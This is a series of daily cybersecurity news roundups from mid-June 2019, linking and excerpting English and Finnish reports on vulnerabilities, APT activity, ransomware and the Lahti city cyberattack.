www.bleepingcomputer.com/news/software/tor-browser-852-released-to-fix-critical-vulnerability/ Tor Browser 8.5.2 has been released to fix a critical vulnerability in Firefox that was fixed by Mozilla this week. It is strongly advised that all Tor users install this update as soon as possible. This week, Mozilla released Firefox 67.0.3 to fix a critical vulnerability discovered by Google Project Zero. The fix for this vulnerability has been ported to the bundled Firefox browser in Tor Browser 8.5.2. This JavaScript type confusion vulnerability was discovered being actively used in targeted attacks and thus needed immediate attention. This bug did not affect users running under the Safer or Safest security levels. See also:

www.zdnet.com/article/tor-browser-8-5-2-release-patches-firefox-flaw-being-exploited-in-the-wild/,

threatpost.com/tor-browser-update-critical-flaw/145857/ and

thehackernews.com/2019/06/tor-browser-firefox-hack.html

Russian APT hacked Iranian APT’s infrastructure back in 2017

www.zdnet.com/article/russian-apt-hacked-iranian-apts-infrastructure-back-in-2017/ Turla APT hacked Iran’s APT34 group and used its C&C servers to re-infect APT34 victims with its own malware. As fellow ZDNet writer Andrada Fiscutean once wrote in the fall of 2017: “Spies hack. But the best spies hack other spies.”. That story revolved around a Virus Bulletin 2017 talk detailing several mysterious cases where APTs (advanced persistent threats, a technical term used to describe government-backed hacking units) appeared to had compromised the infrastructure of other APTs, either by accident, or intentionally. While investigating this campaign for its own report, Symantec said it found evidence that sometime in November 2017, the Turla APT (which Symantec calls Waterbug) had hacked into the server infrastructure of an Iranian APT known as APT34 (also known as Oilrig or Crambus). See also:

www.bleepingcomputer.com/news/security/turla-espionage-group-hacks-oilrig-apt-infrastructure/

Linux Cryptominer Uses Virtual Machines to Attack Windows, macOS

www.bleepingcomputer.com/news/security/linux-cryptominer-uses-virtual-machines-to-attack-windows-macos/ A new cryptocurrency mining malware dubbed LoudMiner uses virtualization software to deploy a Linux XMRig coinminer variant on Windows and macOS systems via a Tiny Core Linux virtual machine. The malware comes bundled within cracked copies Windows and macOS VST software such as Propellerhead Reason, Ableton Live, Sylenth1, Nexus, Reaktor, and AutoTune.

Finnairin nimissä leviää huijausviesti älä klikkaa

www.is.fi/digitoday/tietoturva/art-2000006149309.html Finnair kertoo Facebookissa, että yhtiön nimissä leviää tietojenkalasteluviesti Facebookissa ja Instagramissa. Kyseessä on Finnairin julkaisuksi naamioitu mainos, jossa luvataan ilmaisia lentolippuja, mikäli luovuttaa tietonsa julkaisuun linkitetylle verkkosivulle.

Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-19

Apu: Kyberhyökkäys tietoverkkoihin voisi pimentää Suomen oletko varautunut?

www.apu.fi/artikkelit/kyberhyokkays-tietoverkkoihin-voisi-pimentaa-suomen

Kiinan tiedustelupalvelu värvää vakoilijoita LinkedInissä myös suomalaisia ulkopolitiikan asiantuntijoita lähestytty

yle.fi/uutiset/3-10838995 Raportin on laatinut Ulkopoliittisen instituutin ohjelmajohtaja Mika Aaltola.

Quick Detect: Exim “Return of the Wizard” Attack

isc.sans.edu/forums/diary/Quick+Detect+Exim+Return+of+the+Wizard+Attack/25052/ =Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 (aka “Return of the Wizard”). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well.

ESS: Hyvinvointiyhtymä lähetti turhia laskuja, sotkun syytä selvitetään – vastuun välttely tapahtuneesta alkoi saman tien

www.ess.fi/uutiset/paijathame/art2549228 Virhelaskut liittyivät yhtymässä tehtyyn tietojärjestelmän päivitykseen, jossa huoltokatkon aikana syntyi virheellistä laskuttamista. Näin tapahtui, koska vanhaa maksuliikennettä alettiin automaattisesti käsitellä osittain uudelleen.

ESS: Kirjastojärjestelmä on saatu toimimaan Lahden kirjastoissa viimeviikkoinen kyberhyökkäys vaikuttaa kaupungin palveluihin yli juhannuksen

www.ess.fi/uutiset/paijathame/art2549182

Ryuk Ransomware Adds IP and Computer Name Blacklisting

www.bleepingcomputer.com/news/security/ryuk-ransomware-adds-ip-and-computer-name-blacklisting/ A new variant of the Ryuk Ransomware has been discovered that adds IP address and computer blacklisting so that matching computers will not be encrypted.. When BleepingComputer asked Kremez why he felt they were making these checks, he told us that it was likely to avoid encrypting computers in Russia.

Oracle patches another actively-exploited WebLogic zero-day

www.zdnet.com/article/oracle-patches-another-actively-exploited-weblogic-zero-day/ Oracle released an out-of-band security update to fix a vulnerability in WebLogic servers that was being actively exploited in the real world to hijack users’ systems.. Attacks using this vulnerability were first reported by Chinese security firm Knownsec 404 Team on June 15, last Saturday.

Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-18

Microsoft Operating Systems BlueKeep Vulnerability

www.us-cert.gov/ncas/alerts/AA19-168A BlueKeep (CVE-2019-0708) exists within the Remote Desktop Protocol (RDP) used by the Microsoft Windows OSs listed above. An attacker can exploit this vulnerability to perform remote code execution on an unprotected system.

Russian Hacks on U.S. Voting System Wider Than Previously Known

www.bloomberg.com/news/articles/2017-06-13/russian-breach-of-39-states-threatens-future-u-s-elections Russias cyberattack on the U.S. electoral system before Donald Trumps election was far more widespread than has been publicly revealed, including incursions into voter databases and software systems in almost twice as many states as previously reported.

THE HIGHLY DANGEROUS ‘TRITON’ HACKERS HAVE PROBED THE US GRID

www.wired.com/story/triton-hackers-scan-us-power-grid/ Over the past several months, security analysts at the Electric Information Sharing and Analysis Center (E-ISAC) and the critical-infrastructure security firm Dragos have been tracking a group of sophisticated hackers carrying out broad scans of dozens of US power grid targets, apparently looking for entry points into their networks. Scanning alone hardly represents a serious threat. But these hackers, known as Xenotimeor sometimes as the Triton ac

Microsoft Management Console Bugs Allow Windows Takeover

threatpost.com/microsoft-management-console-bugs/145791/ A Windows interface that allows system administrators to configure and monitor systems from an admin level has several vulnerabilities that would allow an attacker to install malicious payloads and even take over a target, privileged machine.

GoldBrute: the botnet searching for RDP connections

www.pandasecurity.com/mediacenter/malware/goldbrute-botnet-rdp/ This new threat is GoldBrute, a botnet that is currently scanning the Internet, actively searching for Windows machines with the Remote Desktop Protocol (RDP) connection enabled. The researchers have discovered that the malware has compiled a list of 1.5 million unique systems with RDP enabled.

Threat Actors Use Older Cobalt Strike Versions to Blend In

www.bleepingcomputer.com/news/security/threat-actors-use-older-cobalt-strike-versions-to-blend-in/ Plenty of outdated Cobalt Strike servers exist in the wild, helping cybercriminals or giving security professionals the upper hand when testing corporate defenses; and they can be easily identified to stifle intrusions of any purpose.

Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-17

Bloomberg: Argentina Isnt Ruling Out a Cyberattack in Major Power Outage

www.bloomberg.com/news/articles/2019-06-16/massive-power-failure-sweeps-across-argentina-and-uruguay Though a cyberattack isnt the primary hypothesis, it cant be ruled out, Argentine Energy Secretary Gustavo Lopetegui told reporters in Buenos Aires. A technical issue or simple humidity could have triggered the breakdown, said Carlos Garcia Pereira, head of Transener, Argentinas largest power-transmission operator.

ESS: Kyberhyökkäys lamaannuttaa Lahden kaupungin palveluja vielä alkuviikosta järjestelmät normalisoituvat ensi viikolla

www.ess.fi/uutiset/paijathame/art2548459 Kaupungilla on tehty selvitys- ja puhdistustöitä koneilla koko viikonlopun ajan. Järjestelmiä ei olla saatu kuitenkaan vielä käyttökuntoon, joten työt jatkuvat maanantaina. Tämä tarkoittaa sitä, että myös verkon käyttöä on rajoitettu.. Lahden kaupungin tietohallintojohtaja Marko Monnin mukaan kaupungin sisäinen verkko toimii normaalisti, mutta ulkoverkosta tulevat palvelut joudutaan puhdistamaan erikseen. Tämä tarkoittaa sitä, että alas ajetut palvelut tarkistetaan ja otetaan käyttöön yksi kerrallaan.

ESS: Ensimmäiset järjestelmät toimivat jo Lahden kyberhyökkäyksen jälkien tarkistaminen vie aikaa

www.ess.fi/uutiset/art2548622 Ensimmäisiä järjestelmiä ja nettisivustoja on saatu takaisin käyttöön Lahden kaupungin tietoverkkoa ja työasemia kohdanneen kyberhyökkäyksen jäljiltä. Virustorjuntaohjelma havaitsi haittaohjelman viime viikon tiistaina.. Tällä hetkellä kaupungin internet-liittymä on kiinni.

Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-16

Kaikkien kuntien tietoturvassa olisi parantamisen varaa Lahteen kohdistuneessa kyberhyökkäyksessä tuhat tietokonetta saastui

www.ess.fi/uutiset/kotimaa/art2548337 Lahden kyberhyökkäyksen kaltaista tapahtumaa oli osattu odottaa, toteaa Liikenne- ja viestintäviraston Traficomin johtava asiantuntija Kauto Huopio. Rikolliset etsivät jatkuvasti verkon haavoittuvuuksia ja iskevät heikkoon kohtaan heti sellaisen havaittuaan. Kyse voi olla tunneista.

Telegram CEO Fingers China State Actors for DDoS Attack

threatpost.com/telegram-ceo-china-ddos-attack/145654/ The chief executive of secure messaging app Telegram is pointing the finger squarely at China as the culprit responsible for the distributed denial of service (DDoS) attack that it suffered on Wednesday.

Yubico to replace vulnerable YubiKey FIPS security keys

www.zdnet.com/article/yubico-to-replace-vulnerable-yubikey-fips-security-keys/ Yubico said today it plans to replace certain hardware security keys because of a firmware flaw that reduces the randomness of cryptographic keys generated by its devices.

Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-15

Exim email servers are now under attack

www.zdnet.com/article/exim-email-servers-are-now-under-attack/ At least two hacker groups have been identified carrying out attacks, one operating from a public internet server, and one using a server located on the dark web. Myös:

www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

ThreatList: Ransomware Trojans Picking Up Steam in 2019

threatpost.com/threatlist-ransomware-trojans-picking-up-steam-in-2019/145718/ The report outlined popular trends in the malware space such as growing popularity of multimodular trojans and ransomware, and decreasing popularity of malicious cryptomining. Overall, cyberincidents grew by 11 percent from the first quarter of 2018 according to the report.

Mysterious Iranian group is hacking into DNA sequencers

www.zdnet.com/article/mysterious-iranian-group-is-hacking-into-dna-sequencers/ Web-based DNA sequencer applications are under attack from a mysterious hacker group using a still-unpatched zero-day to take control of targeted devices.

Experts: Spy used AI-generated face to connect with targets

phys.org/news/2019-06-experts-spy-ai-generated.html William Evanina, director of the U.S. National Counterintelligence and Security Center, said foreign spies routinely use fake social media profiles to home in on American targetsand accused China in particular of waging “mass scale” spying on LinkedIn.

Hacking these medical pumps is as easy as copying a booby-trapped file over the network

www.theregister.co.uk/2019/06/13/medical_workstation_vulnerabilities/ Two security vulnerabilities in medical workstations can exploited by scumbags to hijack the devices and connected infusion pumps, potentially causing harm to patients, the US government revealed today.

U.S. Escalates Online Attacks on Russias Power Grid

www.nytimes.com/2019/06/15/us/politics/trump-cyber-russia-grid.html In interviews over the past three months, the officials described the previously unreported deployment of American computer code inside Russias grid and other targets as a classified companion to more publicly discussed action directed at Moscows disinformation and hacking units around the 2018 midterm elections.